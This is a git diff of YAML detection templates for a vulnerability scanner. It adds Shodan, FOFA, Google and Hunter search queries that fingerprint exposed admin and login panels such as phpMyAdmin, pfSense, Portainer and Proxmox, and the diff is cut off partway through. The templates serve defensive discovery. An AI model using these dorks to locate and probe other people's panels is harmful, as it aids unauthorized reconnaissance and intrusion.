shodan-query: + - http.title:"Orchid Core VMS" + - http.title:"orchid core vms" + fofa-query: title="orchid core vms" + google-query: intitle:"orchid core vms" tags: panel,orchid,ipconfigure http: diff --git a/http/exposed-panels/osticket-panel.yaml b/http/exposed-panels/osticket-panel.yaml index 048f7c665f..132db24ad5 100644 --- a/http/exposed-panels/osticket-panel.yaml +++ b/http/exposed-panels/osticket-panel.yaml @@ -10,11 +10,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: osticket - shodan-query: http.html:"powered by osTicket" - vendor: osticket verified: true + max-request: 2 + vendor: osticket + product: osticket + shodan-query: + - http.html:"powered by osTicket" + - http.title:"osticket" + - http.html:"powered by osticket" + - http.title:"osticket installer" + fofa-query: + - body="powered by osticket" + - title="osticket" + - title="osticket installer" + google-query: + - intitle:"osticket" + - intitle:"osticket installer" tags: panel,osticket http: diff --git a/http/exposed-panels/osticket/osticket-install.yaml b/http/exposed-panels/osticket/osticket-install.yaml index 560dccff29..6a4db2fa22 100644 --- a/http/exposed-panels/osticket/osticket-install.yaml +++ b/http/exposed-panels/osticket/osticket-install.yaml @@ -11,11 +11,22 @@ info: cwe-id: CWE-284 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: osticket - shodan-query: http.title:"osTicket Installer" - vendor: osticket verified: true + max-request: 2 + vendor: osticket + product: osticket + shodan-query: + - http.title:"osTicket Installer" + - http.title:"osticket" + - http.html:"powered by osticket" + - http.title:"osticket installer" + fofa-query: + - body="powered by osticket" + - title="osticket" + - title="osticket installer" + google-query: + - intitle:"osticket" + - intitle:"osticket installer" tags: panel,osticket,install http: diff --git a/http/exposed-panels/ourmgmt3-panel.yaml b/http/exposed-panels/ourmgmt3-panel.yaml index d64d1abaa4..9f2d767df5 100644 --- a/http/exposed-panels/ourmgmt3-panel.yaml +++ b/http/exposed-panels/ourmgmt3-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"OurMGMT3" - verified: true tags: panel,ourmgmt3 http: diff --git a/http/exposed-panels/outsystems-servicecenter-panel.yaml b/http/exposed-panels/outsystems-servicecenter-panel.yaml index 25363b87a5..a0340e6596 100644 --- a/http/exposed-panels/outsystems-servicecenter-panel.yaml +++ b/http/exposed-panels/outsystems-servicecenter-panel.yaml @@ -10,8 +10,8 @@ info: - https://www.outsystems.com/ metadata: verified: true - max-request: 1 - shodan-query: http.html:"outsystems" + max-request: 2 + shodan-query: "http.html:\"outsystems\"" tags: panel,outsystems,login,detect http: diff --git a/http/exposed-panels/overseerr-panel.yaml b/http/exposed-panels/overseerr-panel.yaml index 87932b0891..c33b8921a3 100644 --- a/http/exposed-panels/overseerr-panel.yaml +++ b/http/exposed-panels/overseerr-panel.yaml @@ -10,9 +10,9 @@ info: - https://overseerr.dev/ - https://github.com/sct/overseerr metadata: - fofa-query: Overseerr account - max-request: 1 verified: true + max-request: 1 + fofa-query: Overseerr account tags: panel,overseerr,detect http: diff --git a/http/exposed-panels/pahtool-panel.yaml b/http/exposed-panels/pahtool-panel.yaml index 012020c54a..99d4ab7d33 100644 --- a/http/exposed-panels/pahtool-panel.yaml +++ b/http/exposed-panels/pahtool-panel.yaml @@ -9,9 +9,9 @@ info: reference: - http://www.inovultus.com/index.html metadata: + verified: true max-request: 1 shodan-query: http.title:"PAHTool" - verified: true tags: panel,pahtool,login,detect http: diff --git a/http/exposed-panels/pairdrop-panel.yaml b/http/exposed-panels/pairdrop-panel.yaml index d2474629df..79580f49f0 100644 --- a/http/exposed-panels/pairdrop-panel.yaml +++ b/http/exposed-panels/pairdrop-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/schlagmichdoch/pairdrop metadata: + verified: true max-request: 1 shodan-query: title:"PairDrop" - verified: true tags: panel,pairdrop,login http: diff --git a/http/exposed-panels/panabit-panel.yaml b/http/exposed-panels/panabit-panel.yaml index 668ea10cdc..7e918ecb69 100644 --- a/http/exposed-panels/panabit-panel.yaml +++ b/http/exposed-panels/panabit-panel.yaml @@ -11,8 +11,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Panabit-智能网关" max-request: 1 + fofa-query: app="Panabit-智能网关" tags: panabit,panel http: diff --git a/http/exposed-panels/pandora-fms-console.yaml b/http/exposed-panels/pandora-fms-console.yaml index 79d1cbeb9f..1e542de6ac 100644 --- a/http/exposed-panels/pandora-fms-console.yaml +++ b/http/exposed-panels/pandora-fms-console.yaml @@ -13,8 +13,11 @@ info: cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: pandora_fms vendor: pandorafms + product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: panel,edb,pandorafms http: diff --git a/http/exposed-panels/papercut-ng-panel.yaml b/http/exposed-panels/papercut-ng-panel.yaml index 0726e81f5f..dacd7fb781 100644 --- a/http/exposed-panels/papercut-ng-panel.yaml +++ b/http/exposed-panels/papercut-ng-panel.yaml @@ -9,11 +9,20 @@ info: classification: cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: - google-query: html:'content="PaperCut' - max-request: 1 - product: papercut_ng - vendor: papercut verified: true + max-request: 1 + vendor: papercut + product: papercut_ng + google-query: + - html:'content="PaperCut' + - html:'content="papercut' + shodan-query: + - http.html:'content="papercut' + - cpe:"cpe:2.3:a:papercut:papercut_ng" + - http.html:"content=\"papercut\"" + fofa-query: + - body='content="papercut' + - body="content=\"papercut\"" tags: panel,papercut,detect http: diff --git a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml index d3e74122bc..3793ab57e7 100644 --- a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml +++ b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:parallels:h-sphere:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: h-sphere - shodan-query: title:"Parallels H-Sphere" - vendor: parallels verified: true + max-request: 1 + vendor: parallels + product: h-sphere + shodan-query: + - title:"Parallels H-Sphere" + - http.title:"h-sphere" + - http.title:"parallels h-sphere" + fofa-query: + - title="h-sphere" + - title="parallels h-sphere" + google-query: + - intitle:"h-sphere" + - intitle:"parallels h-sphere" tags: panel,parallels,hsphere http: diff --git a/http/exposed-panels/parse-dashboard.yaml b/http/exposed-panels/parse-dashboard.yaml index c20004c656..174451535d 100644 --- a/http/exposed-panels/parse-dashboard.yaml +++ b/http/exposed-panels/parse-dashboard.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:parseplatform:parse-server:*:*:*:*:node.js:*:*:* metadata: - max-request: 1 - product: parse-server - shodan-query: title:"Parse Dashboard" - vendor: parseplatform verified: true + max-request: 1 + vendor: parseplatform + product: parse-server + shodan-query: + - title:"Parse Dashboard" + - http.title:"parse dashboard" + fofa-query: title="parse dashboard" + google-query: intitle:"parse dashboard" tags: panel,parse,exposure,parseplatform http: diff --git a/http/exposed-panels/passbolt-panel.yaml b/http/exposed-panels/passbolt-panel.yaml index 06aec42466..66bdcb5061 100644 --- a/http/exposed-panels/passbolt-panel.yaml +++ b/http/exposed-panels/passbolt-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.passbolt.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"Passbolt | Open source password manager for teams" - verified: true tags: panel,passbolt,login http: diff --git a/http/exposed-panels/payroll-management-system-panel.yaml b/http/exposed-panels/payroll-management-system-panel.yaml index 3868bdb66d..4794b0b663 100644 --- a/http/exposed-panels/payroll-management-system-panel.yaml +++ b/http/exposed-panels/payroll-management-system-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Admin | Employee's Payroll Management System" - verified: true tags: panel,payroll http: diff --git a/http/exposed-panels/pdi-device-page.yaml b/http/exposed-panels/pdi-device-page.yaml index 4bff88bde9..0399c86419 100644 --- a/http/exposed-panels/pdi-device-page.yaml +++ b/http/exposed-panels/pdi-device-page.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo?fbid=629130339257489&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: html:"PDI Intellifuel" - verified: true tags: exposure,pdi,intellifuel,panel http: diff --git a/http/exposed-panels/pega-web-panel.yaml b/http/exposed-panels/pega-web-panel.yaml index c3197ad73d..f353341671 100644 --- a/http/exposed-panels/pega-web-panel.yaml +++ b/http/exposed-panels/pega-web-panel.yaml @@ -13,12 +13,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:pega:platform:*:*:*:*:*:*:*:* metadata: - google-query: inurl:"/prweb/PRAuth/app/default" - max-request: 2 - product: platform - shodan-query: title:"Pega Platform" - vendor: pega verified: true + max-request: 2 + vendor: pega + product: platform + shodan-query: + - title:"Pega Platform" + - http.title:"pega platform" + google-query: + - inurl:"/prweb/PRAuth/app/default" + - intitle:"pega platform" + - inurl:"/prweb/prauth/app/default" + fofa-query: title="pega platform" tags: panel,pega http: diff --git a/http/exposed-panels/pentaho-panel.yaml b/http/exposed-panels/pentaho-panel.yaml index 492ae799d9..47ae1b6da0 100644 --- a/http/exposed-panels/pentaho-panel.yaml +++ b/http/exposed-panels/pentaho-panel.yaml @@ -11,6 +11,8 @@ info: metadata: max-request: 1 shodan-query: pentaho + product: vantara_pentaho + vendor: hitachi tags: panel,pentaho http: diff --git a/http/exposed-panels/persis-panel.yaml b/http/exposed-panels/persis-panel.yaml index f8f4350986..38ebd8bd61 100644 --- a/http/exposed-panels/persis-panel.yaml +++ b/http/exposed-panels/persis-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: title:"Persis" - verified: true tags: panel,persis http: diff --git a/http/exposed-panels/pfsense-login.yaml b/http/exposed-panels/pfsense-login.yaml index fc13174f08..34e813c7b9 100644 --- a/http/exposed-panels/pfsense-login.yaml +++ b/http/exposed-panels/pfsense-login.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:pfsense:pfsense:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"pfSense - Login" max-request: 1 - product: pfsense - shodan-query: http.title:"pfSense - Login" vendor: pfsense + product: pfsense + shodan-query: + - http.title:"pfSense - Login" + - http.title:"pfsense - login" + google-query: + - intitle:"pfSense - Login" + - intitle:"pfsense - login" + fofa-query: title="pfsense - login" tags: panel,pfsense http: diff --git a/http/exposed-panels/phabricator-login.yaml b/http/exposed-panels/phabricator-login.yaml index 72810d2aa5..d25db54345 100644 --- a/http/exposed-panels/phabricator-login.yaml +++ b/http/exposed-panels/phabricator-login.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:phacility:phabricator:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: phabricator - shodan-query: html:"phabricator-standard-page" vendor: phacility + product: phabricator + shodan-query: + - html:"phabricator-standard-page" + - http.html:"phabricator-standard-page" + fofa-query: body="phabricator-standard-page" tags: panel,phabricator,phacility http: diff --git a/http/exposed-panels/phoronix-pane.yaml b/http/exposed-panels/phoronix-pane.yaml index 60b8ef0b26..336d4d28ac 100644 --- a/http/exposed-panels/phoronix-pane.yaml +++ b/http/exposed-panels/phoronix-pane.yaml @@ -11,9 +11,11 @@ info: cpe: cpe:2.3:a:phoronix-media:phoronix_test_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phoronix-media product: phoronix_test_suite shodan-query: http.title:"phoronix-test-suite" - vendor: phoronix-media + fofa-query: title="phoronix-test-suite" + google-query: intitle:"phoronix-test-suite" tags: panel,phoronix,phoronix-media http: diff --git a/http/exposed-panels/php-mailer.yaml b/http/exposed-panels/php-mailer.yaml index 6b23015726..1e2aa4769a 100644 --- a/http/exposed-panels/php-mailer.yaml +++ b/http/exposed-panels/php-mailer.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"PHP Mailer" - verified: true tags: panel,php,mailer http: diff --git a/http/exposed-panels/phpcollab-panel.yaml b/http/exposed-panels/phpcollab-panel.yaml index b664f552fc..d2d304d7b2 100644 --- a/http/exposed-panels/phpcollab-panel.yaml +++ b/http/exposed-panels/phpcollab-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: phpcollab - shodan-query: http.title:"PhpCollab" vendor: phpcollab + product: phpcollab + shodan-query: + - http.title:"PhpCollab" + - http.title:"phpcollab" + fofa-query: title="phpcollab" + google-query: intitle:"phpcollab" tags: panel,phpcollab,login http: diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index 06aefcc8ee..209abf647c 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -5,9 +5,9 @@ info: author: ritikchaddha,DhiyaneshDk severity: info metadata: + verified: true max-request: 3 shodan-query: title:"phpLDAPadmin" - verified: true tags: php,phpldapadmin,panel,detect http: diff --git a/http/exposed-panels/phpminiadmin-panel.yaml b/http/exposed-panels/phpminiadmin-panel.yaml index de8aa32c11..d43473a017 100644 --- a/http/exposed-panels/phpminiadmin-panel.yaml +++ b/http/exposed-panels/phpminiadmin-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"phpMiniAdmin" - verified: true tags: panel,phpminiadmin http: diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index 0147c6c7e9..7f8029a89f 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -10,10 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: - max-request: 13 - product: phpmyadmin - shodan-query: http.title:phpMyAdmin + max-request: 14 vendor: phpmyadmin + product: phpmyadmin + shodan-query: + - "http.title:phpMyAdmin" + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - body="pma_servername" && body="4.8.4" + - title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: panel,phpmyadmin http: diff --git a/http/exposed-panels/phppgadmin-panel.yaml b/http/exposed-panels/phppgadmin-panel.yaml index 1c830ef551..c57319b422 100644 --- a/http/exposed-panels/phppgadmin-panel.yaml +++ b/http/exposed-panels/phppgadmin-panel.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: phppgadmin - shodan-query: http.title:phpPgAdmin - vendor: phppgadmin_project verified: true + max-request: 2 + vendor: phppgadmin_project + product: phppgadmin + shodan-query: + - http.title:phpPgAdmin + - http.title:phppgadmin + - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: panel,phppgadmin,phppgadmin_project http: diff --git a/http/exposed-panels/pichome-panel.yaml b/http/exposed-panels/pichome-panel.yaml index 27079c524a..14846c0a7c 100644 --- a/http/exposed-panels/pichome-panel.yaml +++ b/http/exposed-panels/pichome-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.favicon.hash:933976300 - verified: true tags: pichome,panel http: diff --git a/http/exposed-panels/piwigo-panel.yaml b/http/exposed-panels/piwigo-panel.yaml index 7f850c402c..9f6564a5ad 100644 --- a/http/exposed-panels/piwigo-panel.yaml +++ b/http/exposed-panels/piwigo-panel.yaml @@ -10,13 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: - fofa-query: title="piwigo" - google-query: Powered by Piwigo + verified: true max-request: 2 + vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 - vendor: piwigo - verified: true + fofa-query: + - title="piwigo" + - icon_hash=540706145 + google-query: + - Powered by Piwigo + - powered by piwigo tags: panel,piwigo,detect http: diff --git a/http/exposed-panels/planet-estream-panel.yaml b/http/exposed-panels/planet-estream-panel.yaml index 8d347f0d44..6fda588f21 100644 --- a/http/exposed-panels/planet-estream-panel.yaml +++ b/http/exposed-panels/planet-estream-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:planetestream:planet_estream:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: planet_estream - shodan-query: title:"Login - Planet eStream" - vendor: planetestream verified: true + max-request: 1 + vendor: planetestream + product: planet_estream + shodan-query: + - title:"Login - Planet eStream" + - http.title:"login - planet estream" + fofa-query: title="login - planet estream" + google-query: intitle:"login - planet estream" tags: panel,planet,estream,planetestream http: diff --git a/http/exposed-panels/plausible-panel.yaml b/http/exposed-panels/plausible-panel.yaml index 274c5c3b99..435291d7a4 100644 --- a/http/exposed-panels/plausible-panel.yaml +++ b/http/exposed-panels/plausible-panel.yaml @@ -10,9 +10,9 @@ info: - https://plausible.io/ - https://github.com/plausible/analytics metadata: + verified: true max-request: 1 shodan-query: html:"Plausible" - verified: true tags: panel,plausible,detect http: diff --git a/http/exposed-panels/plesk-obsidian-login.yaml b/http/exposed-panels/plesk-obsidian-login.yaml index ad638f0726..17fa1dfccd 100644 --- a/http/exposed-panels/plesk-obsidian-login.yaml +++ b/http/exposed-panels/plesk-obsidian-login.yaml @@ -10,11 +10,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: obsidian - shodan-query: http.html:"Plesk Obsidian" - vendor: plesk verified: true + max-request: 1 + vendor: plesk + product: obsidian + shodan-query: + - http.html:"Plesk Obsidian" + - http.html:"plesk obsidian" + - http.title:"plesk obsidian" + fofa-query: + - body="plesk obsidian" + - title="plesk obsidian" + google-query: intitle:"plesk obsidian" tags: panel,plesk,login,edb http: diff --git a/http/exposed-panels/plesk-onyx-login.yaml b/http/exposed-panels/plesk-onyx-login.yaml index 6cb3338a39..3e5498da68 100644 --- a/http/exposed-panels/plesk-onyx-login.yaml +++ b/http/exposed-panels/plesk-onyx-login.yaml @@ -13,12 +13,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:plesk:onyx:*:*:*:*:*:*:*:* metadata: - google-query: inurl:login_up.php "Plesk Onyx" - max-request: 1 - product: onyx - shodan-query: http.html:"Plesk Onyx" http.html:"plesk-build" - vendor: plesk verified: true + max-request: 1 + vendor: plesk + product: onyx + shodan-query: + - http.html:"Plesk Onyx" http.html:"plesk-build" + - http.html:"plesk onyx" http.html:"plesk-build" + google-query: + - inurl:login_up.php "Plesk Onyx" + - inurl:login_up.php "plesk onyx" + fofa-query: body="plesk onyx" http.html:"plesk-build" tags: panel,plesk,login,edb http: diff --git a/http/exposed-panels/pocketbase-panel.yaml b/http/exposed-panels/pocketbase-panel.yaml index 83b7338994..94ce9a6331 100644 --- a/http/exposed-panels/pocketbase-panel.yaml +++ b/http/exposed-panels/pocketbase-panel.yaml @@ -1,20 +1,20 @@ id: pocketbase-panel -info: - name: PocketBase Panel - Detect - author: userdehghani - severity: info - description: | - PocketBase Login panel was discovered. - reference: - - https://pocketbase.io/ - - https://pocketbase.io/docs/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:981081715 - tags: panel,pocketbase,login,detect - +info: + name: PocketBase Panel - Detect + author: userdehghani + severity: info + description: | + PocketBase Login panel was discovered. + reference: + - https://pocketbase.io/ + - https://pocketbase.io/docs/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:981081715 + tags: panel,pocketbase,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/polycom-admin-detect.yaml b/http/exposed-panels/polycom-admin-detect.yaml index 8031b324f9..a4b238ae62 100644 --- a/http/exposed-panels/polycom-admin-detect.yaml +++ b/http/exposed-panels/polycom-admin-detect.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:h:polycom:vvx:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: vvx vendor: polycom + product: vvx tags: panel,polycom http: diff --git a/http/exposed-panels/portainer-panel.yaml b/http/exposed-panels/portainer-panel.yaml index fbcd2cb197..db9ea1d418 100644 --- a/http/exposed-panels/portainer-panel.yaml +++ b/http/exposed-panels/portainer-panel.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:a:portainer:portainer:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: portainer - shodan-query: title:"Portainer" - vendor: portainer verified: true + max-request: 2 + vendor: portainer + product: portainer + shodan-query: + - title:"Portainer" + - http.title:"portainer" + fofa-query: title="portainer" + google-query: intitle:"portainer" tags: panel,portainer,detect http: diff --git a/http/exposed-panels/posteio-admin-panel.yaml b/http/exposed-panels/posteio-admin-panel.yaml index ecb59d395e..8459343b6f 100644 --- a/http/exposed-panels/posteio-admin-panel.yaml +++ b/http/exposed-panels/posteio-admin-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Poste.io login panel was detected. metadata: + verified: true max-request: 1 shodan-query: title:"Administration login" html:"poste<span" - verified: true tags: panel,poste,login,detect http: diff --git a/http/exposed-panels/posthog-admin-panel.yaml b/http/exposed-panels/posthog-admin-panel.yaml index 0990b04315..aeebe6a8f7 100644 --- a/http/exposed-panels/posthog-admin-panel.yaml +++ b/http/exposed-panels/posthog-admin-panel.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:posthog:posthog:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: posthog product: posthog shodan-query: http.title:"posthog" - vendor: posthog - verified: true + fofa-query: title="posthog" + google-query: intitle:"posthog" tags: panel,posthog http: diff --git a/http/exposed-panels/powercom-network-manager.yaml b/http/exposed-panels/powercom-network-manager.yaml index 0ca14944f9..d1b26df54a 100644 --- a/http/exposed-panels/powercom-network-manager.yaml +++ b/http/exposed-panels/powercom-network-manager.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info metadata: + verified: true max-request: 1 shodan-query: http.title:"PowerCom Network Manager" - verified: true tags: powercommanager,login,panel http: diff --git a/http/exposed-panels/powerjob-panel.yaml b/http/exposed-panels/powerjob-panel.yaml index e39cdefb14..24091a7d93 100644 --- a/http/exposed-panels/powerjob-panel.yaml +++ b/http/exposed-panels/powerjob-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="PowerJob" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="PowerJob" tags: panel,powerjob http: diff --git a/http/exposed-panels/powerlogic-ion.yaml b/http/exposed-panels/powerlogic-ion.yaml index d1351a051b..04af8846ab 100644 --- a/http/exposed-panels/powerlogic-ion.yaml +++ b/http/exposed-panels/powerlogic-ion.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:h:schneider-electric:ion7600:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ion7600 vendor: schneider-electric + product: ion7600 tags: panel,edb,schneider-electric http: diff --git a/http/exposed-panels/processwire-login.yaml b/http/exposed-panels/processwire-login.yaml index a2a1bb1734..1c3d31b695 100644 --- a/http/exposed-panels/processwire-login.yaml +++ b/http/exposed-panels/processwire-login.yaml @@ -11,11 +11,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: processwire product: processwire shodan-query: http.html:"processwire" - vendor: processwire - verified: true + fofa-query: body="processwire" tags: panel,processwire http: diff --git a/http/exposed-panels/project-insight-login.yaml b/http/exposed-panels/project-insight-login.yaml index 7630d5e87b..f9bdf08ea9 100644 --- a/http/exposed-panels/project-insight-login.yaml +++ b/http/exposed-panels/project-insight-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:helpproject:help:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: help - shodan-query: http.title:"Project Insight - Login" vendor: helpproject + product: help + shodan-query: + - http.title:"Project Insight - Login" + - http.title:"project insight - login" + fofa-query: title="project insight - login" + google-query: intitle:"project insight - login" tags: panel,edb,helpproject http: diff --git a/http/exposed-panels/projectsend-login.yaml b/http/exposed-panels/projectsend-login.yaml index 5335c5aa3d..b3788b2ee0 100644 --- a/http/exposed-panels/projectsend-login.yaml +++ b/http/exposed-panels/projectsend-login.yaml @@ -13,10 +13,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:* metadata: - google-query: intext:Provided by ProjectSend max-request: 1 - product: projectsend vendor: projectsend + product: projectsend + google-query: + - intext:Provided by ProjectSend + - intext:provided by projectsend + shodan-query: http.html:provided by projectsend + fofa-query: body=provided by projectsend tags: panel,projectsend,edb http: diff --git a/http/exposed-panels/prometheus-exposed-panel.yaml b/http/exposed-panels/prometheus-exposed-panel.yaml index 3258baa896..160a82d1ff 100644 --- a/http/exposed-panels/prometheus-exposed-panel.yaml +++ b/http/exposed-panels/prometheus-exposed-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: prometheus vendor: prometheus + product: prometheus tags: panel,prometheus http: diff --git a/http/exposed-panels/proofpoint-protection-server-panel.yaml b/http/exposed-panels/proofpoint-protection-server-panel.yaml index 6ddc1bc74b..6f7d96f33e 100644 --- a/http/exposed-panels/proofpoint-protection-server-panel.yaml +++ b/http/exposed-panels/proofpoint-protection-server-panel.yaml @@ -9,11 +9,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 + vendor: proofpoint product: proofpoint protection server shodan-query: http.favicon.hash:942678640 - vendor: proofpoint - verified: true + fofa-query: icon_hash=942678640 tags: panel,proofpoint,login,detect http: diff --git a/http/exposed-panels/proxmox-panel.yaml b/http/exposed-panels/proxmox-panel.yaml index ae7549f6aa..db9aa82dff 100644 --- a/http/exposed-panels/proxmox-panel.yaml +++ b/http/exposed-panels/proxmox-panel.yaml @@ -13,11 +13,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:proxmox:proxmox:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: proxmox product: proxmox shodan-query: http.favicon.hash:213144638 - vendor: proxmox - verified: true + fofa-query: icon_hash=213144638 tags: panel,proxmox,login http: diff --git a/http/exposed-panels/pulsar-admin-console.yaml b/http/exposed-panels/pulsar-admin-console.yaml index 8c74e5d873..01ed139cca 100644 --- a/http/exposed-panels/pulsar-admin-console.yaml +++ b/http/exposed-panels/pulsar-admin-console.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:pulsar:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: pulsar - shodan-query: title:"Pulsar Admin Console" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: pulsar + shodan-query: + - title:"Pulsar Admin Console" + - http.title:"pulsar admin ui" + - http.title:"pulsar admin console" + fofa-query: + - title="pulsar admin ui" + - title="pulsar admin console" + google-query: + - intitle:"pulsar admin ui" + - intitle:"pulsar admin console" tags: panel,pulsar,console,admin,apache http: diff --git a/http/exposed-panels/pulsar-adminui-panel.yaml b/http/exposed-panels/pulsar-adminui-panel.yaml index 35cf90b6fd..8e9b99e7f5 100644 --- a/http/exposed-panels/pulsar-adminui-panel.yaml +++ b/http/exposed-panels/pulsar-adminui-panel.yaml @@ -10,11 +10,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:pulsar:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: pulsar - shodan-query: title:"Pulsar Admin UI" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: pulsar + shodan-query: + - title:"Pulsar Admin UI" + - http.title:"pulsar admin ui" + - http.title:"pulsar admin console" + fofa-query: + - title="pulsar admin ui" + - title="pulsar admin console" + google-query: + - intitle:"pulsar admin ui" + - intitle:"pulsar admin console" tags: panel,pulsar,pulsarui,admin,apache http: diff --git a/http/exposed-panels/pulsar360-admin-panel.yaml b/http/exposed-panels/pulsar360-admin-panel.yaml index bcd2218029..39a9b4e984 100644 --- a/http/exposed-panels/pulsar360-admin-panel.yaml +++ 